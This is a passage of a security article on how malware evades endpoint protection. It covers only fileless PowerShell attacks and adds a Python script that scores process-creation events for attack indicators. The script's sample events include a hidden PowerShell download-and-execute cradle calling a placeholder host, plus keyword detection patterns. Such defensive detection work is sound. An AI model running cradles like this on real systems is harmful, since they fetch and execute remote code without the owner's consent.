6 ways malware can bypass endpoint protection

Breaches from attacks that defeat or run around endpoint protection measures are on the rise. Here's how attackers do it.

Sixty-three percent of IT security professionals say the frequency of attacks has gone up over the past 12 months, according to Ponemon's 2018 State of Endpoint Security Risk report — and 52% of respondents say that not all attacks can realistically be stopped. Their antivirus solutions are blocking only 43% of attacks. Sixty-four percent of respondents said that their organizations had experienced one or more endpoint attacks that resulted in a data breach.

The report, which was based on a survey of 660 IT security professionals, showed that most (70%) said that new and unknown threats to their organizations have increased, while the cost of a successful attack has increased from an average of $5 million to $7.1 million.

However, nearly every computer has some form of protection built in. So why are the attackers still getting through? These are the top methods attackers use to bypass endpoint protection security.

1. Script-based attacks

In a script-based or "fileless" attack, the malware is a script that runs inside an existing, legitimate application, leveraging PowerShell or other already-installed Windows components. No new software is installed on disk, so many traditional defenses that scan files are bypassed.

According to Ponemon, these kinds of attacks are significantly more likely to result in a successful breach, and they're going up, from 30% of all attacks in 2017 to 35% last year. "There would be very few artifacts — for example no actual malware binary to scan," says Jérôme Segura, senior security researcher at Malwarebytes.
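Because a fileless attack leaves no binary to scan, the artifacts a defender does get are process-creation telemetry (Windows Security event 4688 with command-line auditing enabled, or Sysmon event 1) and, if it is turned on, PowerShell script block logging (event 4104). The following triage script is an added example written for this article, not code from CSO, Ponemon or Malwarebytes: it scores simplified, constructed process-creation events for the tells that usually accompany script-host abuse, such as a PowerShell launched by an Office application, a hidden window, a bypassed execution policy, an encoded command or a download-and-execute string. The event field names, the indicator weights and the threshold are assumptions chosen for the example; the parameter-prefix handling reflects how powershell.exe accepts abbreviated parameter names.

```python
"""Score PowerShell process-creation events for common fileless-attack tells.

Added example. The events below are constructed for illustration and do not
come from any real system; field names (parent, image, cmdline) are a
simplified stand-in for Windows 4688 / Sysmon event 1 records.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Parents that rarely have a legitimate reason to launch a script host.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "mshta.exe", "wscript.exe", "cscript.exe"}
# Strings typical of "download and run in memory" one-liners.
CRADLE_RE = re.compile(r"(?i)net\.webclient|downloadstring|downloadfile|"
                       r"invoke-webrequest|\biwr\b|\biex\b|invoke-expression|"
                       r"frombase64string")
THRESHOLD = 4  # assumed alerting threshold for the weights below

# powershell.exe accepts any unambiguous prefix of a parameter name plus a few
# documented short aliases, so "-e", "-ec" and "-enc" all mean -EncodedCommand.
PARAMS = {
    "encodedcommand": {"e", "ec"},
    "windowstyle": {"w"},
    "executionpolicy": {"ex", "ep"},
    "noprofile": {"nop"},
    "noninteractive": {"noni"},
}


@dataclass
class Finding:
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None  # decoded -EncodedCommand payload, if any


def canonical_param(token: str) -> Optional[str]:
    """Map an abbreviated command-line switch to its full parameter name."""
    if not token.startswith("-"):
        return None
    t = token[1:].lower()
    for name, aliases in PARAMS.items():
        if t in aliases or (len(t) >= 3 and name.startswith(t)):
            return name
    return None


def decode_encoded(value: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return None if malformed."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict) -> Finding:
    """Weight the indicators present in one process-creation event."""
    f = Finding()
    if event["image"].lower() not in SCRIPT_HOSTS:
        return f
    parent = event["parent"].lower()
    if parent in SUSPICIOUS_PARENTS:
        f.score += 3
        f.reasons.append(f"script host spawned by {parent}")
    tokens = event["cmdline"].split()  # simple whitespace split; enough for the samples
    for i, tok in enumerate(tokens):
        name = canonical_param(tok)
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if name == "encodedcommand":
            f.score += 3
            f.reasons.append("encoded command")
            f.decoded = decode_encoded(tokens[i + 1]) if nxt else None
        elif name == "windowstyle" and nxt.startswith("hidden"):
            f.score += 2
            f.reasons.append("hidden window")
        elif name == "executionpolicy" and nxt in {"bypass", "unrestricted"}:
            f.score += 2
            f.reasons.append("execution policy bypassed")
        elif name in {"noprofile", "noninteractive"}:
            f.score += 1
            f.reasons.append(name)
    if CRADLE_RE.search(event["cmdline"]):
        f.score += 3
        f.reasons.append("download/execute string in command line")
    return f


def flagged_events(events: List[dict]) -> List[Tuple[dict, Finding]]:
    """Return the events whose score reaches the threshold, with their findings."""
    return [(e, f) for e in events if (f := score_event(e)).score >= THRESHOLD]


# Constructed sample telemetry. The encoded command is built here from a harmless
# string so the decoding path can be demonstrated.
DEMO_ENCODED = base64.b64encode("Write-Host demo".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand {DEMO_ENCODED}"},
    {"parent": "services.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NonInteractive -ExecutionPolicy Bypass -File C:\ProgramData\agent\collect.ps1"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for event, finding in flagged_events(SAMPLE_EVENTS):
        print(f"[{finding.score}] {event['parent']} -> {event['cmdline']}")
        print("   reasons:", ", ".join(finding.reasons))
        if finding.decoded:
            print("   decoded :", finding.decoded)
```

The third sample shows why a threshold matters: an agent run by the service control manager with `-ExecutionPolicy Bypass` is common in managed environments and scores below the line on its own, while the same switch combined with an Office parent or an encoded payload does not. Script block logging (event 4104) is the better source once it is enabled, because it records the script content after decoding and unrolling, so an analyst does not have to reconstruct it from the command line.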
